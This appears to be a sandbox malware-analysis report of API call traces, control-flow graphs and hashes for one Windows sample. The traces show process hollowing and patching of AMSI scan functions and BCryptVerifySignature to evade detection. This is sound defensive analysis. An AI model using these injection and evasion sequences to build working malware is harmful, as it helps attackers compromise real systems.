                                                                                                                                  • NtReadVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000884,002EEFF8,0427A520,00000004,0427A528,ScanBuffer,0427A3D0,04209710,ScanString,0427A3D0,04209710,Initialize,0427A3D0,04209710,UacScan,0427A3D0), ref: 0420882B
                                                                                                                                  • NtUnmapViewOfSection.N(00000884,00400000,ScanBuffer,0427A3D0,04209710,ScanString,0427A3D0,04209710,Initialize,0427A3D0,04209710,00000884,002EEFF8,0427A520,00000004,0427A528), ref: 042089A6
                                                                                                                                    • Part of subcall function 041FFB80: GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 041FFB8D
                                                                                                                                    • Part of subcall function 041FFB80: GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 041FFB93
                                                                                                                                    • Part of subcall function 041FFB80: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 041FFBB3
                                                                                                                                  • NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000884,00400000,00000000,178A4400,0427A528,ScanBuffer,0427A3D0,04209710,ScanString,0427A3D0,04209710,Initialize,0427A3D0,04209710,ScanBuffer,0427A3D0), ref: 04208F89
                                                                                                                                  • NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000884,002EEFF8,0427A524,00000004,0427A528,ScanBuffer,0427A3D0,04209710,ScanString,0427A3D0,04209710,Initialize,0427A3D0,04209710,00000884,00400000), ref: 042090FC
                                                                                                                                  • SetThreadContext.KERNEL32(000005E4,0427A44C,ScanBuffer,0427A3D0,04209710,ScanString,0427A3D0,04209710,Initialize,0427A3D0,04209710,00000884,002EEFF8,0427A524,00000004,0427A528), ref: 04209272
                                                                                                                                  • NtResumeThread.C:\WINDOWS\SYSTEM32\NTDLL(000005E4,00000000,000005E4,0427A44C,ScanBuffer,0427A3D0,04209710,ScanString,0427A3D0,04209710,Initialize,0427A3D0,04209710,00000884,002EEFF8,0427A524), ref: 0420927F
                                                                                                                                    • Part of subcall function 041FFCD8: LoadLibraryW.KERNEL32(bcrypt,04209710,ScanString,0427A3D0,04209710,Initialize,0427A3D0,04209710,UacScan,0427A3D0,04209710,UacInitialize,0427A3D0,04209710,000005E4,0427A44C), ref: 041FFCEA
                                                                                                                                    • Part of subcall function 041FFCD8: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 041FFCF7
                                                                                                                                    • Part of subcall function 041FFCD8: NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000884,00000000,?,00000001,?,00000000,BCryptVerifySignature,bcrypt,04209710,ScanString,0427A3D0,04209710,Initialize,0427A3D0,04209710,UacScan), ref: 041FFD0E
                                                                                                                                    • Part of subcall function 041FFCD8: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,04209710,ScanString,0427A3D0,04209710,Initialize,0427A3D0,04209710,UacScan,0427A3D0,04209710,UacInitialize,0427A3D0), ref: 041FFD1D
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MemoryVirtual$LibraryWrite$AddressProcProcessThread$ContextCurrentFreeHandleLoadModule$AllocateCreateProtectReadResumeSectionUnmapUserView
                                                                                                                                  • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$NtOpenObjectAuditAlarm$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$ntdll
                                                                                                                                  • API String ID: 1232097254-1058128293
                                                                                                                                  • Opcode ID: bb70f5dedb7ea6d2f9ffc740ba7bee53ee293942f2b85cbbdfbc1b64c5528632
                                                                                                                                  • Instruction ID: 0785f2e3d3345bd43283a22c4e11a55247b44ebae8b2313388ecd025ea139feb
                                                                                                                                  • Opcode Fuzzy Hash: bb70f5dedb7ea6d2f9ffc740ba7bee53ee293942f2b85cbbdfbc1b64c5528632
                                                                                                                                  • Instruction Fuzzy Hash: 89D21E7AB105189BEB11EB69DCC0BDEB3B9AF48304F1085E1D109A7265DB31BE86CF54
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 7197 41e5ddc-41e5e1d GetModuleFileNameA RegOpenKeyExA 7198 41e5e5f-41e5ea2 call 41e5c18 RegQueryValueExA 7197->7198 7199 41e5e1f-41e5e3b RegOpenKeyExA 7197->7199 7204 41e5ec6-41e5ee0 RegCloseKey 7198->7204 7205 41e5ea4-41e5ec0 RegQueryValueExA 7198->7205 7199->7198 7200 41e5e3d-41e5e59 RegOpenKeyExA 7199->7200 7200->7198 7202 41e5ee8-41e5f19 lstrcpynA GetThreadLocale GetLocaleInfoA 7200->7202 7206 41e5f1f-41e5f23 7202->7206 7207 41e6002-41e6009 7202->7207 7205->7204 7208 41e5ec2 7205->7208 7210 41e5f2f-41e5f45 lstrlenA 7206->7210 7211 41e5f25-41e5f29 7206->7211 7208->7204 7212 41e5f48-41e5f4b 7210->7212 7211->7207 7211->7210 7213 41e5f4d-41e5f55 7212->7213 7214 41e5f57-41e5f5f 7212->7214 7213->7214 7215 41e5f47 7213->7215 7214->7207 7216 41e5f65-41e5f6a 7214->7216 7215->7212 7217 41e5f6c-41e5f92 lstrcpynA LoadLibraryExA 7216->7217 7218 41e5f94-41e5f96 7216->7218 7217->7218 7218->7207 7219 41e5f98-41e5f9c 7218->7219 7219->7207 7220 41e5f9e-41e5fce lstrcpynA LoadLibraryExA 7219->7220 7220->7207 7221 41e5fd0-41e6000 lstrcpynA LoadLibraryExA 7220->7221 7221->7207
                                                                                                                                  APIs
                                                                                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000105,041E0000,0424A794), ref: 041E5DF8
                                                                                                                                  • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,041E0000,0424A794), ref: 041E5E16
                                                                                                                                  • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,041E0000,0424A794), ref: 041E5E34
                                                                                                                                  • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 041E5E52
                                                                                                                                  • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,041E5EE1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 041E5E9B
                                                                                                                                  • RegQueryValueExA.ADVAPI32(?,041E6048,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,041E5EE1,?,80000001), ref: 041E5EB9
                                                                                                                                  • RegCloseKey.ADVAPI32(?,041E5EE8,00000000,?,?,00000000,041E5EE1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 041E5EDB
                                                                                                                                  • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 041E5EF8
                                                                                                                                  • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 041E5F05
                                                                                                                                  • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 041E5F0B
                                                                                                                                  • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 041E5F36
                                                                                                                                  • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 041E5F7D
                                                                                                                                  • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 041E5F8D
                                                                                                                                  • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 041E5FB5
                                                                                                                                  • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 041E5FC5
                                                                                                                                  • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 041E5FEB
                                                                                                                                  • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 041E5FFB
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                                                                                                                  • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                                                                  • API String ID: 1759228003-2375825460
                                                                                                                                  • Opcode ID: 65eaec36eb3354a06285579f461018028c6083f1cf4efe9291c4472174e89933
                                                                                                                                  • Instruction ID: 81e9e7ac8a8b05ff8b702e64ca1268e4952320ae1096eb48d78d3e4c7235647e
                                                                                                                                  • Opcode Fuzzy Hash: 65eaec36eb3354a06285579f461018028c6083f1cf4efe9291c4472174e89933
                                                                                                                                  • Instruction Fuzzy Hash: 7C51C779E00A5D7EFB25D6E5CCC6FFF77AD9B04744F9000A1A604E6182D774AA448B90
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  • LoadLibraryExA.KERNEL32(00000000,00000000,00000000,00000000,041FFE14), ref: 041FFD70
                                                                                                                                  • GetModuleHandleA.KERNEL32(00000000,00000000,00000000,00000000,00000000,041FFE14), ref: 041FFD7E
                                                                                                                                  • GetProcAddress.KERNEL32(74B80000,00000000), ref: 041FFD97
                                                                                                                                  • GetCurrentProcess.KERNEL32(0427A35C,17D783FC,00000040,00000004,74B80000,00000000,00000000,00000000,00000000,00000000,00000000,041FFE14), ref: 041FFDB3
                                                                                                                                  • NtProtectVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,0427A35C,17D783FC,00000040,00000004,74B80000,00000000,00000000,00000000,00000000,00000000,00000000,041FFE14), ref: 041FFDB9
                                                                                                                                  • GetCurrentProcess.KERNEL32(0427A35C,Function_00006ADC,00000004,0427A360,00000000,0427A35C,17D783FC,00000040,00000004,74B80000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 041FFDE3
                                                                                                                                  • NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,0427A35C,Function_00006ADC,00000004,0427A360,00000000,0427A35C,17D783FC,00000040,00000004,74B80000,00000000,00000000,00000000,00000000,00000000), ref: 041FFDE9
                                                                                                                                  • FreeLibrary.KERNEL32(74B80000,00000000,0427A35C,Function_00006ADC,00000004,0427A360,00000000,0427A35C,17D783FC,00000040,00000004,74B80000,00000000,00000000,00000000,00000000), ref: 041FFDF4
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CurrentLibraryMemoryProcessVirtual$AddressFreeHandleLoadModuleProcProtectWrite
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1488642996-0
                                                                                                                                  • Opcode ID: a974e2a1484565a22cbb4463b895426337ef3ab5256c441cdcfcbee3ed9a6c49
                                                                                                                                  • Instruction ID: 0e06c8bb35df3c28445273a2c4c9f18478a6047835b832e9be823eda06d1bdd7
                                                                                                                                  • Opcode Fuzzy Hash: a974e2a1484565a22cbb4463b895426337ef3ab5256c441cdcfcbee3ed9a6c49
                                                                                                                                  • Instruction Fuzzy Hash: D8116374B00704AFEB00FBFEDCC5A6EB7A8DB44618F904065B108E7251C774BD119B28
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 7520 41ffcd8-41ffcf3 LoadLibraryW 7521 41ffcf5-41ffcfe GetProcAddress 7520->7521 7522 41ffd22-41ffd2a 7520->7522 7523 41ffd1c-41ffd1d FreeLibrary 7521->7523 7524 41ffd00-41ffd18 NtWriteVirtualMemory 7521->7524 7523->7522 7524->7523 7525 41ffd1a 7524->7525 7525->7523
                                                                                                                                  APIs
                                                                                                                                  • LoadLibraryW.KERNEL32(bcrypt,04209710,ScanString,0427A3D0,04209710,Initialize,0427A3D0,04209710,UacScan,0427A3D0,04209710,UacInitialize,0427A3D0,04209710,000005E4,0427A44C), ref: 041FFCEA
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 041FFCF7
                                                                                                                                  • NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000884,00000000,?,00000001,?,00000000,BCryptVerifySignature,bcrypt,04209710,ScanString,0427A3D0,04209710,Initialize,0427A3D0,04209710,UacScan), ref: 041FFD0E
                                                                                                                                  • FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,04209710,ScanString,0427A3D0,04209710,Initialize,0427A3D0,04209710,UacScan,0427A3D0,04209710,UacInitialize,0427A3D0), ref: 041FFD1D
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Library$AddressFreeLoadMemoryProcVirtualWrite
                                                                                                                                  • String ID: BCryptVerifySignature$bcrypt
                                                                                                                                  • API String ID: 1002360270-4067648912
                                                                                                                                  • Opcode ID: dec7ec7695fe1640c704fb7054e57799260cb30f75dba453070541c8a224f21d
                                                                                                                                  • Instruction ID: d6cade5ba3d0fba39653c72e30a08cde3158baa932cd32688e3d1afa188255a0
                                                                                                                                  • Opcode Fuzzy Hash: dec7ec7695fe1640c704fb7054e57799260cb30f75dba453070541c8a224f21d
                                                                                                                                  • Instruction Fuzzy Hash: 2DF0E9366056142DF11051255CC0EBF265CCBC17A4F54862EF6548A180D7A1AD0682B9
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  • GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 041FFB8D
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 041FFB93
                                                                                                                                  • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 041FFBB3
                                                                                                                                  Strings
                                                                                                                                  • NtAllocateVirtualMemory, xrefs: 041FFB83
                                                                                                                                  • C:\Windows\System32\ntdll.dll, xrefs: 041FFB88
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressAllocateHandleMemoryModuleProcVirtual
                                                                                                                                  • String ID: C:\Windows\System32\ntdll.dll$NtAllocateVirtualMemory
                                                                                                                                  • API String ID: 421316089-2206134580
                                                                                                                                  • Opcode ID: be19eebf2b72be839e6b66b764c220fc5cef9ffd50af10e415595e50ad66622e
                                                                                                                                  • Instruction ID: 1dda6284607757a868d25292c314745baf373371df119c9db31943f9fa01539a
                                                                                                                                  • Opcode Fuzzy Hash: be19eebf2b72be839e6b66b764c220fc5cef9ffd50af10e415595e50ad66622e
                                                                                                                                  • Instruction Fuzzy Hash: 45E075B6240248BBDB40DE99DC95EEB77ECEB18750B804016BA18D7241D774E9118B69
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  • GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 041FFB8D
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 041FFB93
                                                                                                                                  • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 041FFBB3
                                                                                                                                  Strings
                                                                                                                                  • NtAllocateVirtualMemory, xrefs: 041FFB83
                                                                                                                                  • C:\Windows\System32\ntdll.dll, xrefs: 041FFB88
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressAllocateHandleMemoryModuleProcVirtual
                                                                                                                                  • String ID: C:\Windows\System32\ntdll.dll$NtAllocateVirtualMemory
                                                                                                                                  • API String ID: 421316089-2206134580
                                                                                                                                  • Opcode ID: 64fece702f37cc2905d344c32a840f5ca12638fe7b8bb00971d2cd10adff9277
                                                                                                                                  • Instruction ID: 3cd661124bc8d86898ed2b41162bd2081958fcb24c52077923919f5dc3732f4e
                                                                                                                                  • Opcode Fuzzy Hash: 64fece702f37cc2905d344c32a840f5ca12638fe7b8bb00971d2cd10adff9277
                                                                                                                                  • Instruction Fuzzy Hash: 7AE092B624024CBBDB40EF99EC95EDB77ECEB18750F804016BA18D7241D774F9118BA9
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 041E5228: SysAllocStringLen.OLEAUT32(?,?), ref: 041E5236
                                                                                                                                  • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0423B838), ref: 0423B7A3
                                                                                                                                  • NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,0423B838), ref: 0423B7D3
                                                                                                                                  • NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 0423B7E8
                                                                                                                                  • NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 0423B814
                                                                                                                                  • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 0423B81D
                                                                                                                                    • Part of subcall function 041E4F68: SysFreeString.OLEAUT32(0423C89C), ref: 041E4F76
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$PathString$AllocCloseFreeInformationNameName_OpenQueryRead
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1897104825-0
                                                                                                                                  • Opcode ID: bf67100ef0de85e921bd3d9eca1acf94ef93aceee3ab00317a04f5d509a4e5d6
                                                                                                                                  • Instruction ID: 10c1af23fc3b29a43be7727953064e50826153b62dc9e020ec843c77bbc3c7b2
                                                                                                                                  • Opcode Fuzzy Hash: bf67100ef0de85e921bd3d9eca1acf94ef93aceee3ab00317a04f5d509a4e5d6
                                                                                                                                  • Instruction Fuzzy Hash: B521C075B50608BAEB11EAA5CC82FEEB7BCAF48B04F514561B600E71C1DA74BA058794
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 0423BC76
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CheckConnectionInternet
                                                                                                                                  • String ID: Initialize$OpenSession$ScanBuffer
                                                                                                                                  • API String ID: 3847983778-3852638603
                                                                                                                                  • Opcode ID: 21eefd563374f1907d77a99f41769cabbfc75d7f9a15ff42561753c58641ee4e
                                                                                                                                  • Instruction ID: d3f626a3ddd281ebe4db13f6c3ac810250a23a954e9080d43290ef86279c4e84
                                                                                                                                  • Opcode Fuzzy Hash: 21eefd563374f1907d77a99f41769cabbfc75d7f9a15ff42561753c58641ee4e
                                                                                                                                  • Instruction Fuzzy Hash: 17415E39B105089FEB10EFA5D9C0EEEB7B9EF58605F214826E150B7251DB71FD028B54
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 041E5228: SysAllocStringLen.OLEAUT32(?,?), ref: 041E5236
                                                                                                                                  • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0423B756), ref: 0423B6C3
                                                                                                                                  • NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0423B6FD
                                                                                                                                  • NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 0423B72A
                                                                                                                                  • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 0423B733
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FilePath$AllocCloseCreateNameName_StringWrite
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3764614163-0
                                                                                                                                  • Opcode ID: e4ec1e4ecfc342adcd332442eef7678f557443c95d5e49e8dfffea59dcae8b95
                                                                                                                                  • Instruction ID: 532b772a2cd4defb901d19640df2d959b4f95d62f7a73e50f252e371e31b760a
                                                                                                                                  • Opcode Fuzzy Hash: e4ec1e4ecfc342adcd332442eef7678f557443c95d5e49e8dfffea59dcae8b95
                                                                                                                                  • Instruction Fuzzy Hash: B721EE75E50608BAEB20EAA5CC82F9EB7BCDF44B04F514461B600F71C1D7B0BB048A64
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 041E5228: SysAllocStringLen.OLEAUT32(?,?), ref: 041E5236
                                                                                                                                  • RtlInitUnicodeString.N(?,?,00000000,0423B676), ref: 0423B624
                                                                                                                                  • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,0423B676), ref: 0423B63A
                                                                                                                                  • NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,0423B676), ref: 0423B659
                                                                                                                                    • Part of subcall function 041E4F68: SysFreeString.OLEAUT32(0423C89C), ref: 041E4F76
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: String$Path$AllocDeleteFileFreeInitNameName_Unicode
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1694942484-0
